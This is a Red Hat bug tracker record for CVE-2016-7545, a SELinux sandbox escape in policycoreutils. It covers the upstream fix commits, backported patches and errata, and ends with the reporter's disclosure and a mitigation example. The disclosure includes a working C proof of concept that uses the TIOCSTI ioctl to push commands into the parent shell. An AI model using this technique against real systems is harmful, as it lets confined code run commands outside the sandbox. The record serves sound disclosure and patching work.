Bug 1378577 (CVE-2016-7545)
| Summary: | CVE-2016-7545 policycoreutils: SELinux sandbox escape via TIOCSTI ioctl | | |
|---|---|---|---|
| Product: | [Other] Security Response | Reporter: | Federico Manuel Bento <up201407890> |
| Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
| Status: | CLOSED ERRATA | QA Contact: | |
| Severity: | high | Docs Contact: | |
| Priority: | high | | |
| Version: | unspecified | CC: | cbuissar, cperry, dwalsh, kdudka, lvrabec, mgrepl, mmalik, plautrba, pmoore, redhat-bugzilla, security-response-team, ssekidde, vmojzis, wmealing, yozone |
| Target Milestone: | --- | Keywords: | Reopened, Security |
| Target Release: | --- | | |
| Hardware: | All | | |
| OS: | Linux | | |
| Whiteboard: | | | |
| Fixed In Version: | | Doc Type: | If docs needed, set a value |
| Doc Text: | It was found that the sandbox tool provided in policycoreutils was vulnerable to a TIOCSTI ioctl attack. A specially crafted program executed via the sandbox command could use this flaw to execute arbitrary commands in the context of the parent shell, escaping the sandbox. | | |
| Story Points: | --- | | |
| Clone Of: | | Environment: | |
| Last Closed: | 2017-03-15 14:17:34 UTC | Type: | Bug |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | | Category: | --- |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | | | |
| Bug Depends On: | 1378932, 1380733, 1380734, 1380735, 1380736, 1429954, 1429955 | | |
| Bug Blocks: | 1378931 | | |
| Attachments: | | | |
Upstream mailing list discussion:

* https://marc.info/?t=147463464400001&r=1&w=2

Created policycoreutils tracking bugs for this issue:

Affects: fedora-all [bug 1378932]

Upstream fixes:

* https://marc.info/?l=selinux&m=147465156612756&w=2
* https://marc.info/?l=selinux&m=147466045909969&w=2

This was assigned CVE-2016-7545.

References:

http://seclists.org/oss-sec/2016/q3/606

(In reply to Paul Moore from comment #4)
> Upstream fixes:
>
> * https://marc.info/?l=selinux&m=147465156612756&w=2

To be clear, the patch above is not strictly necessary, but very helpful.

commit 5b98f39de5119dcc865f6c7923682fb10219d45a
Author: Petr Lautrbach <plautrba>
Date: Fri Sep 23 19:24:15 2016 +0200

sandbox: do not try setup directories without -X or -M

sandbox tried to copy all affected files to the new home or tmp even though -M or -X was not specified and there was no new directory.

Fixes:
$ sandbox ls ~
/usr/bin/sandbox: [Errno 17] File exists: '/root'

Signed-off-by: Petr Lautrbach <plautrba>

> * https://marc.info/?l=selinux&m=147466045909969&w=2

This is the patch that fixes the vulnerability.

commit acca96a135a4d2a028ba9b636886af99c0915379
Author: Petr Lautrbach <plautrba>
Date: Fri Sep 23 19:24:16 2016 +0200

sandbox: create a new session for sandboxed processes

It helps to prevent sandboxed processes to inject arbitrary commands into the parent.

Signed-off-by: Petr Lautrbach <plautrba>

Created attachment 1205640 [details]
Basic SRPM patch against Rawhide (no changelog or rev bumps)

Created attachment 1205641 [details]
Rawhide patch (policycoreutils-2.5-17.fc26.src.rpm)

Koji scratch-build:

* http://koji.fedoraproject.org/koji/taskinfo?taskID=15848819

Created attachment 1205642 [details]
F25 patch (policycoreutils-2.5-17.fc25.src.rpm)

Koji scratch-build:

* http://koji.fedoraproject.org/koji/taskinfo?taskID=15848928

Created attachment 1205646 [details]
F24 patch (policycoreutils-2.5-14.fc24.src.rpm)

Koji scratch-build:

* http://koji.fedoraproject.org/koji/taskinfo?taskID=15849131

Created attachment 1205663 [details]
F23 patch (policycoreutils-2.4-22.fc23.src.rpm)

Koji scratch-build:

* http://koji.fedoraproject.org/koji/taskinfo?taskID=15849416

Created attachment 1205679 [details]
RHEL-7.3 patch (policycoreutils-2.5-9.el7.src.rpm)

Created attachment 1205701 [details]
RHEL-6.9 patch (policycoreutils-2.0.83-30.el6.src.rpm)

NOTE: It looks like we did not backport the SELinux sandbox code to RHEL-5.x.

NOTE: While I've backported and done scratch builds for Rawhide, F25, F24, F23, RHEL-7.3, and RHEL-6.9, I haven't yet had a chance to verify these patches/builds.

This issue has been addressed in the following products:

Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 6

Via RHSA-2016:2702 https://rhn.redhat.com/errata/RHSA-2016-2702.html

This issue has been addressed in the following products:

Red Hat Enterprise Linux 7.1 Extended Update Support

Via RHSA-2017:0536 https://rhn.redhat.com/errata/RHSA-2017-0536.html

This issue has been addressed in the following products:

Red Hat Enterprise Linux 7.2 Extended Update Support

Via RHSA-2017:0535 https://rhn.redhat.com/errata/RHSA-2017-0535.html
Hi,

When executing a program via the SELinux sandbox, the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing an attacker to escape the sandbox.

$ cat test.c

```c
#include <unistd.h>
#include <sys/ioctl.h>

int main() {
    char *cmd = "id\n";
    /* TIOCSTI queues one byte at a time into the terminal's input buffer */
    while (*cmd)
        ioctl(0, TIOCSTI, cmd++);
    execlp("/bin/id", "id", (char *)NULL);
}
```

$ gcc test.c -o test
$ /bin/sandbox ./test
id
uid=1000 gid=1000 groups=1000 context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
[saken@ghetto ~]$ id <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

This is similar to CVE-2016-2568, CVE-2016-2779, etc.

Thanks,
Federico Bento.
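The fix commit above (acca96a, "create a new session for sandboxed processes") works because the kernel honours TIOCSTI only on the caller's controlling terminal unless the caller has CAP_SYS_ADMIN; a child placed in a fresh session with setsid() has no controlling terminal, so the ioctl on its inherited fd 0 is refused. The following is an added example, not policycoreutils code and not the upstream patch: it spawns a command in a new session, has the child verify it really lost its terminal before exec, and provides a check for whether a given descriptor is still a controlling tty. The names run_in_new_session, detach_from_controlling_tty and fd_is_controlling_tty are this example's own.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <sys/wait.h>
#include <unistd.h>

/* Exit codes the child reports so the parent can tell why detaching failed. */
enum { CHILD_OK = 0, CHILD_SETSID_FAILED = 1, CHILD_STILL_HAS_TTY = 2 };

/* Child side: start a fresh session and verify we no longer own a terminal.
 * A new session has no controlling tty, so /dev/tty fails to open (ENXIO) and
 * an unprivileged TIOCSTI on any inherited tty fd is refused with EPERM. */
static int detach_from_controlling_tty(void)
{
    if (setsid() == (pid_t)-1 || getsid(0) != getpid())
        return CHILD_SETSID_FAILED;
    int fd = open("/dev/tty", O_RDWR | O_NOCTTY);
    if (fd >= 0) {
        close(fd);
        return CHILD_STILL_HAS_TTY;
    }
    return CHILD_OK;
}

/* Fork, detach the child into its own session, then exec argv there.
 * Returns the child's exit status, or -1 if fork/wait failed. */
int run_in_new_session(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        int rc = detach_from_controlling_tty();
        if (rc != CHILD_OK)
            _exit(rc);
        execvp(argv[0], argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* 1 if fd is this process's controlling terminal, i.e. the only descriptor on
 * which the kernel accepts TIOCSTI from an unprivileged caller; 0 otherwise. */
int fd_is_controlling_tty(int fd)
{
    return tcgetpgrp(fd) != (pid_t)-1;
}
```

Running the reporter's test program through run_in_new_session from an interactive shell makes the injected "id" line disappear; the child's ioctl fails with EPERM while /bin/id still executes in the child.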